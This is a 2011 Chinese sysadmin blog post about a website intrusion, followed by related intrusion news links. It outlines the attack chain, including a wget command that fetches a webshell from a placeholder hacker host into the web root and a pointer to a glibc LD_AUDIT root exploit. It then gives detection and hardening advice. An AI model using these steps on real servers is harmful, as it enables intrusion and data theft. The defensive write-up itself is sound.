关于入侵那点事-发现之旅

标签: 1.系统服务 Linux shell | 发表时间:2011-04-07 12:44 | 作者:Michael Field kezonet
出处:http://hiadmin.com

4月1日,一个疯狂好玩的日子,本应该娱乐娱乐,同学们又在轻松迎接清明节,结果却发生了网站遭入侵事件,也算咱们运气以及人品爆发,正好有同事再进行服务器更新结果发现可疑进程,才及时避免了网站用户数据的遭窃。

一、入侵基本过程:

1、利用web框架漏洞取得webshell;(至于是什么漏洞这里就不抖露。)

2、上传后门代码方法之一:wget htt://xx.heike.com/webshell.txt;  mv webshell.txt  /wwwroot/.xx/xxx.[html/jsp/asp....];

3、www调用该页面,取得服务级用户权限,并查找架构配置文件和其中的数据库用户密码;

       网上有个现成的jsp脚本,截个图大家看看:

     

      详细功能可查看:jsp管理系统

4、到这里已经顺利的完成后门部署,可以执行远程普通用户shell了,后果已经相当可怕了。

       不过这还不算完,有了普通用户的权限,离root还遥远吗?

5、利用glibc2.X 漏洞进行提权获取root帐号;(目前测下来RH5、centos5、FC13、ubuntu10…. 都悲催的)

       怎么操作网上一查都是,关键字就是LD_AUDIT,同学们自己试试。

6、除了架构漏洞外,只要是被入侵后服务器,都还会留下其他多个后门隐藏在系统中、防不胜防。

二、一些处理意见

以下所写只是个人意见,一定也会存在不少疏忽和遗漏,只要你开启服务就必要有漏洞可以被利用。

1、第一时间当然是断开服务,切走流量,最好是能切断网络(如果可以的话),killall可疑进程;

2、ps -eafww中查找各个进程的父子关系,以便寻踪觅迹,找到后门代码($0伪装进程名,这里不点透了,有经验的sa应该都知道。)

3、找后门代码的方法很多,我自己琢磨了几个,希望对大家以后查找防范有帮助;

       1)find /wwwroot/中的文件 按修改和创建时间查;

       2)在所有目录中查找以被利用的服务用户为属主的文件:比如apache nobody等等;

       3)grep -r 后门代码特征字段查找文件;

       4) file * 查找后缀名和内容不相符的文件;

       5)access log 可疑clientip/useragent/POST动作等等;

       6)抛砖引玉……

4、就算预防吧,其实只是提高入侵成本罢了;

       1)使用ssh key登录;

       2)限制服务器对外访问,什么要访问www?(用proxy限制访问的域名,iptables限制ip)总之开的越小越好,最好是不开。

       3)user一律nologin;开个服务要登录shell?

       4)卸载编译工具,好像狠了点提高了不少维护成本啦,那就改名吧。(gcc cc都改)

       5)glibc升级,我说说而已大家自己斟酌。

       6)熟悉selinux的 enforce起来;

晚上辗转反侧睡不着,自己琢磨的。

相关 [入侵 发现之旅] 推荐:

关于入侵那点事-发现之旅

- kezonet - 架构研究室
4月1日,一个疯狂好玩的日子,本应该娱乐娱乐,同学们又在轻松迎接清明节,结果却发生了网站遭入侵事件,也算咱们运气以及人品爆发,正好有同事再进行服务器更新结果发现可疑进程,才及时避免了网站用户数据的遭窃. 1、利用web框架漏洞取得webshell;(至于是什么漏洞这里就不抖露. 2、上传后门代码方法之一:wget htt://xx.heike.com/webshell.txt;  mv webshell.txt  /wwwroot/.xx/xxx.[html/jsp/asp....];.

Linux.com 遭受入侵

- leafduo - LinuxTOY
Linux 基金会旗下的 Linux.com 和 LinuxFoundation.org 网站,由于发现安全漏洞,进入离线维护状态. 感谢 gbraad 提供消息. Linux Foundation infrastructure including LinuxFoundation.org, Linux.com, and their subdomains are down for maintenance due to a security breach that was discovered on September 8, 2011.

kernel.org服务器遭入侵

- Lamo - Solidot
kernel.org网站首页发布公告,声称多台服务器在本月初(8月12日前)遭黑客攻击,他们在8月28日发现了入侵. 入侵者利用一位用户凭证获得了服务器根访问权限,他们正在调查黑客是如何提升权限的;系统启动脚本被加入了一个木马启动文件;ssh相关文件被修改. kernel.org声称,他们相信Linux kernel源代码库未受影响,因为git分布式版本控制系统的特性决定了它可以很容易注意到代码变化.

Linux.com 遭受入侵(更新)

- leafduo - LinuxTOY
Linux 基金会旗下的 Linux.com 和 LinuxFoundation.org 网站,由于发现安全漏洞,进入离线维护状态. 感谢 gbraad 提供消息. Linux Foundation infrastructure including LinuxFoundation.org, Linux.com, and their subdomains are down for maintenance due to a security breach that was discovered on September 8, 2011.

Linux入侵检测基础

- - WooYun知识库
在linux中有5个用于审计的命令:. last:这个命令可用于查看我们系统的成功登录、关机、重启等情况;这个命令就是将/var/log/wtmp文件格式化输出. lastb:这个命令用于查看登录失败的情况;这个命令就是将/var/log/btmp文件格式化输出. lastlog:这个命令用于查看用户上一次的登录情况;这个命令就是将/var/log/lastlog文件格式化输出.

[警告] LastPass 可能被黑客入侵

- hongwen he - Chrome迷
提供基于 Web 的密码管理服务 LastPass 可能已经于近日遭受到黑客攻击,并要求用户修改主密码. LastPass 团队在博客中说道:. 周二早上我们发现我们的一个非主要服务器上有数分钟的网络流量异常,这种偶尔发生的情况最后通常确定是我们员工的操作或者是由一个自动执行的脚本引起. 但这一次我们没有找到根本原因,在对这个异常情况进行深入分析之后,我们在一个数据库上发现一个类似但更小的匹配流量异常(该数据库发送的流量比我们其他数据库接收的流量更多).

黑客轻易入侵花旗银行

- Wuvist - Solidot
Visame 写道 "盗取超过200,000名花旗银行客户资料的黑客使用了一种极其简单的方法入侵. 此举被称作是近年来最大胆的一次银行入侵. 黑客们仅仅是简单地登录花旗公司的信用卡客户专区,然后把浏览器地址栏中自己的帐号替换成他人的帐号,便可顺利进入他人的帐号. 随后黑客们使用计算机程序重复这一过程.

外星猫正在入侵地球

- 雪倩 - 鸸鹋动物园
借用微博上狗发发同学的话:“它们平时都是装出来的,它们在每个我们睡去的夜晚,都直立行走并且屹立在窗前抽着烟叹气:明天还要继续装萌喵,再忍忍喵,2012母舰就来接我们了喵”. © 丸子 for 鸸鹋动物园, 2011. 转发本文地址 外星猫正在入侵地球 http://www.ermiao.com/video/20110905/21712.html.

Wine HQ数据库被入侵

- Alu - Solidot
Wine HQ承认数据库遭黑客入侵,用户信息泄露. 官方声明称,黑客下载了Wine HQ Application Database登录数据库和bugzilla中的所有登录数据,虽然密码经过了加密,但只要有足够时间简单密码都是可以被轻易解密的. 他们已经封堵了允许读访问数据库表的系统漏洞,为防止未来的破坏,它重置了用户密码,并通过电子邮件向受影响的用户发送了新的密码.

俄亥俄州模拟僵尸入侵

- phus - Solidot
俄亥俄州特拉华县(Delaware County)联邦紧急事务管理局举行了一场僵尸入侵模拟演习,有超过225个志愿者打扮成了僵尸. 组织者希望,僵尸主题的模拟演习能比工业事故或车祸演习吸引更多的人参与. 当地的一位发言人称,特拉华县的人迷上了僵尸. 这一演习是受到了美国疾病控制和预防中心的僵尸预警指南的启发.